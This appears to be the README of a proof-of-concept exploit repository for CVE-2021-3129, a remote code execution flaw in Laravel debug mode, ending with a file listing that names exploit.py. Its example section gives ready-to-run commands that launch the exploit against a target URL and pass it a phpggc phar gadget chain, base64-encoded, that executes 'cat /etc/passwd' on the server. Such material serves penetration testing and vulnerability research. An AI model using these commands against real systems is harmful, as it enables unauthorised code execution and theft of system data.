Laravel debug mode - Remote Code Execution (RCE)# CVE-2021-3129
Laravel debug mode - Remote Code Execution (RCE)
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3129
- https://www.ambionics.io/blog/laravel-debug-rce
- https://github.com/ambionics/phpggc
# Example
```bash
python3 exploit.py http://127.0.0.1:8080
```
```bash
python3 exploit.py http://127.0.0.1:8080 --phar $(php -d phar.readonly=off -d phar.require_hash=off ./phpggc --phar phar -f monolog/rce1 system 'cat /etc/passwd' | base64 -w 0)
```
[4.0K] /data/pocs/df5d5402edd4d5603951cb69b1db323bf0d39a08
├── [4.1K] exploit.py
├── [1.0K] LICENSE
└── [ 471] README.md
0 directories, 3 files